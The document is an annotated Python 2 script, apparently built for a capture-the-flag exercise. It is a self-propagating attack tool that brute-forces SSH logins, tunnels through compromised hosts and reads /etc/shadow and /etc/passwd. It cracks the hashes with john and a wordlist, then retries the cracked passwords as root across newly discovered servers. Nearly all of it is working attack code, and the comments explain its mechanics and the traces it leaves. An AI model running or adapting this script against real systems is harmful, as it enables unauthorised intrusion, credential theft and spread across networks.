  1. #!/usr/bin/env python2
  2. import paramiko
  3. import sys
  4. import os
  5. import subprocess
  6. import re
  7.  
  8. current_user = sys.argv[1]
# Starting credentials are taken straight from the command line (argv[1] is
# the user, argv[2] the password). Nothing validates argv, so fewer than two
# arguments raises IndexError here. Secrets passed this way are also readable
# by other local users through process listings and shell history.
  9. current_pass = sys.argv[2]
# creds: host -> list of (user, password) pairs that logged in successfully.
# "SELF" stands for the host this script is started on; the other entries
# are added by crack() and rerevisit().
  10. creds = {"SELF":[(current_user,current_pass)]}
  11. #users = ["root","student"]
  12. #passwords = ["student","student123"]
# users / passwords: the login lists tried by crack() (all pairs) and
# rerevisit() (passwords only, as root). Both grow when jack() recovers new
# pairs from a passwd/shadow dump.
  13. users = [current_user]
  14. passwords = [current_pass]
# Matches one line of john's output as "<password> (<user>)": group(1) is the
# password, group(2) the user (consumed in jack()). This assumes john's
# default output layout; confirm against the installed version.
  15. credmatcher = re.compile('^(\S+)\s+\((\S+)\)$')
# flag_org: host -> contents of /flag.txt read from that host.
  16. flag_org = {}
# visited: hosts with at least one successful login (appended in crack()).
  17. visited = []
  18.  
# count_shadow is incremented once per jack() call (not per successful
# crack). count_ssh_key is never updated or read anywhere in this file.
  19. count_shadow = 0
  20. count_ssh_key = 0
  21.  
# ip: FIFO queue of (target "host:port", host it was learned from) pairs; the
# origin is None for the seed list read from ~/servers.txt. ip_tmp holds the
# bare targets already queued and is only used to suppress duplicates.
  22. ip_tmp = []
  23. ip = [] #tuples: (ip_addr, where it's from)
# revisit: (target, origin) pairs reached as a non-root user; rerevisit()
# retries them as root whenever the password list grows.
  24. revisit = []
# conn: host -> (tunnel transport or None, connected paramiko.SSHClient), as
# returned by tunnel_from_client().
  25. conn = {} #key:host, value:(tunnel,connection)
  26.  
  27. # client is the ssh client, dest is ip
  28. def tunnel_from_client(dest,user,pw,client=None):
"""Open a password-authenticated SSH session to ``dest`` ("host:port").

When ``client`` is an already-connected paramiko.SSHClient, the new session
is carried over a direct-tcpip channel opened on that client's transport,
i.e. the connection is proxied through the host ``client`` is attached to.
Otherwise the connection is made directly. Returns ``(trans, dest_client)``
where ``trans`` is the proxying transport, or None for a direct connection.
There is no error handling here: connection and authentication failures
propagate to the caller as paramiko / socket exceptions.
"""
# Every call points paramiko's debug log at log.txt in the working
# directory, so each connection attempt leaves an on-disk record on the
# launching host.
  29. paramiko.util.log_to_file("log.txt")
  30. dest_info = dest.split(":")
  31. dest_ip = dest_info[0]
# A ``dest`` without a ":port" part raises IndexError here; a non-numeric
# port raises ValueError.
  32. dest_port = int(dest_info[1])
  33. dest_client = paramiko.SSHClient()
# AutoAddPolicy accepts whatever host key the peer presents, so the session
# has no protection against host impersonation or interception.
  34. dest_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  35. if client:
  36. trans = client.get_transport()
# The source address advertised to the proxy host is fixed at 127.0.0.1:22.
  37. ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',22),dest_addr=(dest_ip,dest_port))
# The triple-quoted block below is a bare string literal -- dead code left
# over from a variant that took a src_port argument.
  38. """
  39. if src_port:
  40. ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',src_port),dest_addr=(dest_ip,dest_port))
  41. else:
  42. ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',22),dest_addr=(dest_ip,dest_port))
  43. #ch = trans.open_channel('direct-tcpip',src_addr=('127.0.0.1',22),dest_addr=(dest_ip,dest_port))
  44. """
# The channel is handed to connect() as the socket, so the SSH handshake to
# dest runs inside the proxy host's session.
  45. dest_client.connect(dest_ip,port=dest_port,username=user,password=pw,sock=ch)
  46. else:
  47. trans = None
  48. dest_client.connect(dest_ip,port=dest_port,username=user,password=pw)
  49. return trans,dest_client
  50.  
  51.  
  52. def jack(password,shadow):
"""Recover credentials from a passwd/shadow pair and grow the login lists.

``password`` is the text of an /etc/passwd file and ``shadow`` the text of
the matching /etc/shadow (note the argument order). Both are written to
password.txt / shadow.txt in the working directory, merged with ``unshadow``
into mypasswd and handed to ``john`` with rockyou.txt; every
"<password> (<user>)" line of john's output adds an unseen user to ``users``
and an unseen password to ``passwords``. Returns True when either list grew
and False otherwise -- including on any error, which is printed rather than
raised.
"""
  53. changed = False
  54. global users, passwords,count_shadow
# Counts calls, not successful cracks: incremented before any work is done.
  55. count_shadow += 1
  56. try:
# Cleartext copies of both files are written to the current directory with
# the default umask (the umask line below is commented out). The handles are
# closed explicitly rather than with a ``with`` block.
  57. p = open("password.txt","w")
  58. u = open("shadow.txt","w")
  59. p.write(str(password))
  60. p.close()
  61. u.write(str(shadow))
  62. u.close()
  63. #subprocess.Popen("umask 077",shell=True)
# Both external tools are launched through the shell (shell=True) with fixed
# command strings; unshadow is started with Popen and not waited on before
# john is launched.
  64. subprocess.Popen("unshadow password.txt shadow.txt > mypasswd",shell=True)
  65. result = subprocess.Popen("john mypasswd --wordlist=rockyou.txt",stdout=subprocess.PIPE,shell=True)
  66.  
# readlines() blocks until john closes its stdout. The local name ``creds``
# (a match object or None) shadows the module-level creds dict inside this
# function; ``u`` and ``p`` are rebound from file handles to strings here.
  67. for line in result.stdout.readlines():
  68. creds = credmatcher.match(line)
  69. if creds:
  70. u = creds.group(2)
  71. if u not in users:
  72. users.append(u)
  73. changed = True
  74. p = creds.group(1)
  75. if p not in passwords:
  76. passwords.append(p)
  77. changed = True
  78.  
# Clean-up is also spawned without waiting, so the three temp files can
# still exist briefly after this function returns. john's own pot file is
# not touched by this command.
  79. subprocess.Popen("rm password.txt shadow.txt mypasswd",shell=True)
  80. return changed
  81.  
# Catches everything raised above (file, subprocess or regex errors),
# reports it with the originating line number and returns whatever
# ``changed`` was at that point.
  82. except Exception as e:
  83. print e
  84.  
  85. exc_type, exc_obj, exc_tb = sys.exc_info()
  86. fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
  87. print(exc_type, fname, exc_tb.tb_lineno)
  88. print "Cannot crack passwords"
  89. return changed
  90.  
  91.  
  92. def crack(ip_addr,come_from):
"""Try every (user, password) pair from the module lists against ``ip_addr``.

``ip_addr`` is a "host:port" string and ``come_from`` the host it was learned
from (None for seed targets). When ``come_from`` already has an entry in
``conn``, each attempt is proxied through that host's session via
tunnel_from_client(). On the first success the pair is appended to
``creds``, the session stored in ``conn`` and the host in ``visited``, and
the username is returned. Returns False when no pair works. Every exception
raised by an attempt is swallowed, so an unreachable host and a rejected
password are indistinguishable to the caller.
"""
  93. global conn,creds
  94. for u in users:
  95. for p in passwords:
  96. try:
# Each iteration is a complete SSH authentication against the target; a
# target's sshd authentication log would normally record every failed one.
  97. print "[*] Attempting login to "+ip_addr+" with " + u + "/" + p
  98. if come_from in conn.keys():
# conn values are (tunnel, client) pairs; only the client is reused here.
  99. _,connection = conn[come_from]
  100. tunnel,client = tunnel_from_client(ip_addr,u,p,connection)
  101. else:
  102. tunnel,client=tunnel_from_client(ip_addr,u,p)
  103. if ip_addr in creds.keys():
  104. creds[ip_addr].append((u,p))
  105. else:
  106. creds[ip_addr] = [(u,p)]
  107. conn[ip_addr] = (tunnel,client)
  108. visited.append(ip_addr)
  109. print "[*] Login to " + ip_addr + " succeeded"
  110. # TODO add to creds list
# Returns on the first working pair; the remaining combinations are not
# tried, so at most one entry per call is added to creds.
  111. return u
# Any failure (auth rejected, timeout, bad "host:port") just moves on to the
# next pair; the exception is discarded.
  112. except Exception as e:
  113. #print e
  114. continue
  115. return False
  116.  
  117.  
  118. # revisit all the computers in revisit to try and crack root
  119. # once root is cracked go to etc password and etc shadow
  120. def rerevisit():
"""Retry every host in ``revisit`` as root and harvest it on success.

For each (target, origin) pair, every entry of ``passwords`` is tried with
the user "root". On success the session is stored in ``conn``, the pair in
``creds``, and three files are read over the session: ~/servers.txt (new
targets appended to ``ip``), /flag.txt (stored in ``flag_org``) and
/etc/shadow plus /etc/passwd (passed to jack()). Pairs that succeeded are
removed from ``revisit`` after the loop; failures stay for the next call.
Returns None.
"""
  121. global revisit,creds
# (target, origin) pairs that succeeded, removed from revisit below.
  122. tmp2 = []
  123. for ip_addr, from_where in revisit:
  124. for p in passwords:
  125. try:
  126. print "[*] *revisiting for root* Attempting login to "+ip_addr+" with root/" + p
  127. if from_where:
# NOTE(review): this unpacks three values, but conn entries are stored as
# (tunnel, client) pairs everywhere else in this file, so the proxied branch
# looks like it raises ValueError and falls into the except below -- confirm.
# In this branch ``connection`` would also be the origin host's client, not
# the new session.
  128. _,connection,src_port = conn[from_where]
  129. tunnel,client = tunnel_from_client(ip_addr,"root",p,connection)
  130. else:
  131. tunnel,client = tunnel_from_client(ip_addr,"root",p)
  132. connection=client
  133.  
# No break after a success: the remaining passwords are still tried against
# the same host, and each further success appends to tmp2 and creds again.
  134. conn[ip_addr] = (tunnel,client)
  135. tmp2.append((ip_addr,from_where))
  136. print "[*] Login to " + ip_addr + " succeeded"
  137.  
  138. if ip_addr in creds.keys():
  139. creds[ip_addr].append(("root",p))
  140. else:
  141. creds[ip_addr] = [("root",p)]
  142. # TODO look for flags and server
# The harvest is three plain ``cat`` commands over exec_command. On a host
# with command auditing these are the visible trace of this step; the
# script writes nothing on the remote side.
  143. _,stdout,stderr=connection.exec_command("cat ~/servers.txt")
  144. tmp = stdout.read()
  145. if tmp:
  146. print "[*] Found servers file on " + ip_addr
  147. for i in tmp.strip().split("\n"):
  148. # TODO print statement
# ip_tmp deduplicates targets across both the seed list and every
# servers.txt read so far.
  149. if i not in ip_tmp:
  150. ip.append((i,ip_addr))
  151. ip_tmp.append(i)
  152. # every time you update this list, go thru revisit once
  153. print "[+] Adding " + str(tmp.strip().split("\n")) + " to global target queue"
  154. else:
  155. print "[*] Servers file not found on " + ip_addr
  156.  
  157. _,stdout,stderr=connection.exec_command("cat /flag.txt")
  158. tmp = stdout.read()
  159. if tmp:
  160. if ip_addr not in flag_org.keys():
  161. print "[!] Flag file found on " + ip_addr + ", contents: \"" + tmp + "\""
  162. flag_org[ip_addr] = tmp
  163. else:
  164. print "[!] Flag file had been found before on " + ip_addr
# Empty stdout and empty stderr (file exists but is empty) prints nothing.
  165. elif stderr.read():
  166. print "[*] No flag file found on " + ip_addr
  167.  
  168.  
  169.  
  170. _,stdout,stderr=connection.exec_command("cat /etc/shadow")
  171. shadow = stdout.read()
  172. _,stdout,stderr=connection.exec_command("cat /etc/passwd")
  173. passwd = stdout.read()
  174. # TODO add to etc shadow count
# jack() takes the passwd text first and the shadow text second; it is
# called even when both reads came back empty.
  175. jack(passwd,shadow)
  176. # rerevisit()
# The bare ``continue`` runs first, so the error reporting after it is
# unreachable: any failure for this password is silent and the next
# password is tried.
  177. except Exception as e:
  178. continue
  179. print "ERRORRR"
  180. exc_type, exc_obj, exc_tb = sys.exc_info()
  181. fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
  182. print(exc_type, fname, exc_tb.tb_lineno)
  183. print e
  184. continue
  185.  
# If the same pair was appended to tmp2 more than once (several working
# passwords), the second remove() would raise ValueError, which nothing
# here catches.
  186. for i in tmp2:
  187. revisit.remove(i)
  188.  
  189.  
  190.  
  191.  
  192. ip_list = subprocess.Popen("cat ~/servers.txt",stdout=subprocess.PIPE,shell=True)
# Script body. The seed target list is ~/servers.txt on the starting host,
# one "host:port" per line, read via a shell ``cat``; seed entries carry
# origin None. An empty or missing file still yields a single "" entry,
# because "".split("\n") == [""].
  193. print "[*] Read targets file"
  194. for i in ip_list.stdout.read().strip().split("\n"):
  195. ip.append((i,None))
  196. # TODO crack password file for initial server, append to users and passwords
# The local shadow/passwd files are read the same way. If /etc/shadow is not
# readable by the current user, ``cat`` fails and jack() simply receives an
# empty string -- there is no error here.
  197. shadow = subprocess.Popen("cat /etc/shadow",stdout=subprocess.PIPE,shell=True)
  198. passwd = subprocess.Popen("cat /etc/passwd",stdout=subprocess.PIPE,shell=True)
  199. jack(passwd.stdout.read(),shadow.stdout.read())
  200.  
# Main loop: pop the oldest target, attempt a login with crack(), then
# harvest the host over the stored session.
  201. while(ip):
  202. #print "current IP list: " + str(ip)
  203. #print "need to revisit: " + str(revisit)
  204. current,come_from = ip.pop(0)
# u is the username that logged in, or False.
  205. u = crack(current,come_from)
# ip and revisit hold (target, origin) tuples while visited holds plain
# strings, so the set difference is only ever empty when both ip and revisit
# are empty. The check runs before the harvest below, so when it fires the
# host just popped is not read (its servers.txt, flag and shadow are
# skipped).
  206. if not ((set(ip)|set(revisit))-set(visited)):
  207. break
  208. try:
  209. if u:
# Non-root sessions are queued for a root retry in rerevisit().
  210. if u != "root":
  211. revisit.append((current,come_from))
  212.  
  213. _,connection = conn[current]
# Same harvest sequence as rerevisit(): ~/servers.txt -> new targets,
# /flag.txt -> flag_org, /etc/shadow + /etc/passwd -> jack(). Each is a
# plain ``cat`` over exec_command; nothing is written on the remote host.
  214. _,stdout,stderr=connection.exec_command("cat ~/servers.txt")
  215. tmp = stdout.read()
  216. if tmp:
  217. print "[*] Found servers file on " + current
  218. for i in tmp.strip().split("\n"):
  219. # TODO print statement
  220. if i not in ip_tmp:
  221. ip.append((i,current))
  222. ip_tmp.append(i)
  223. # every time you update this list, go thru revisit once
  224. print "[+] Adding " + str(tmp.strip().split("\n")) + " to global target queue"
  225. else:
  226. print "[*] Servers file not found on " + current
  227.  
  228. _,stdout,stderr=connection.exec_command("cat /flag.txt")
  229. f = stdout.read()
  230. if f:
  231. if current not in flag_org.keys():
  232. print "[!] Flag file found on " + current + ", contents: \"" + f + "\""
  233. flag_org[current] = f
  234. else:
  235. print "[!] Flag file had been found before on " + current
  236.  
  237. elif stderr.read():
  238. print "[*] No flag file found on " + current
  239.  
# Only when /etc/shadow came back non-empty is /etc/passwd read and the pair
# handed to jack(); rerevisit() then retries the pending non-root hosts with
# any passwords jack() added.
  240. _,stdout,stderr=connection.exec_command("cat /etc/shadow")
  241. tmp = stdout.read()
  242. if tmp:
  243. _,stdout,stderr=connection.exec_command("cat /etc/passwd")
  244. print "[*] Dumping /etc/shadow"
  245. jack(stdout.read(),tmp)
  246. rerevisit()
  247.  
  248. elif stderr.read():
  249. print "[*] User "+u+" on "+current+" cannot access /etc/shadow"
  250.  
# No credential worked: the target goes to the back of the queue. It only
# ever leaves via the break above (both queues empty), so with two or more
# unreachable targets this loop appears not to terminate -- confirm.
  251. else:
  252. print "[*] " + current + " back in line"
  253. ip.append((current,come_from))
# Harvest errors (e.g. a dropped session) are printed with their line number
# and the loop moves on; the host is not re-queued.
  254. except Exception as e:
  255. exc_type, exc_obj, exc_tb = sys.exc_info()
  256. fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
  257. print e
  258. print exc_tb.tb_lineno
  259. continue
  260.  
  261.  
# Summary. count_shadow counts jack() calls, not files successfully cracked,
# and len(passwords) includes the starting password. On the launching host
# the run leaves log.txt (paramiko log) and, transiently, password.txt,
# shadow.txt and mypasswd in the working directory.
  262. print "\n\n=========="
  263. print "Collected " + str(count_shadow) + " /etc/shadow files"
  264. print "Cracked " + str(len(passwords)) + " Passwords"
  265. print "Found " + str(len(flag_org.keys())) + " flag files"
  266. print "Accessed following ips: " + str(creds)